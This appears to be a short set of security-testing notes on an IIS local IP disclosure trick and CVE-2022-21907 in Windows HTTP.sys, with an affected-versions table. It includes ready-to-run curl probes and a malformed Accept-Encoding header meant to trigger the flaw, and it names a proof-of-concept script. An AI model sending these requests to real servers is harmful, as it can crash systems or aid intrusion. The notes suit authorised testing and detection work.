IIS Local IP Disclosure

**curl -v -I --http1.0 <https://pm.company.com/> -H 'Host:'**

CVE-2022-21907 - HTTP Protocol Stack Remote Code Execution Vulnerability

Windows10Exploits/2022/CVE-2022-21907 at master · nu11secur1ty/Windows10Exploits

Untitled

Affected MS-Windows Versions


Microsoft Windows 10     | Windows 10 Version 1809 for 32-bit Systems
                         | Windows 10 Version 1809 for x64-based Systems
                         | Windows 10 Version 1809 for ARM64-based Systems
                         | Windows 10 Version 21H1 for 32-bit Systems
                         | Windows 10 Version 21H1 for x64-based System
                         | Windows 10 Version 21H1 for ARM64-based Systems
                         | Windows 10 Version 20H2 for 32-bit Systems
                         | Windows 10 Version 20H2 for x64-based Systems
                         | Windows 10 Version 20H2 for ARM64-based Systems
                         | Windows 10 Version 21H2 for 32-bit Systems
                         | Windows 10 Version 21H2 for x64-based Systems
                         | Windows 10 Version 21H2 for ARM64-based Systems

Microsoft Windows 11     | Windows 11 for x64-based Systems
                         | Windows 11 for ARM64-based Systems

Microsoft Windows Server | Windows Server 2019 and Core Installation
                         | Windows Server 2022 and Server Core Installation
                         | Windows Server 20H2 Server Core Installation

Detection

curl "<http://192.168.1.8/201>" -H "Accept-Encoding: pwn, pwned, package"
curl "<http://192.168.1.8/302>" -H "Accept-Encoding: pwn, pwned, package"
curl "<http://192.168.1.8/404>" -H "Accept-Encoding: pwn, pwned, package"

Request

Accept-Encoding: -1337,,,,,,,,,

POC

PoC-CVE-2022-21907.py

python3 PoC-CVE-2022-21907.py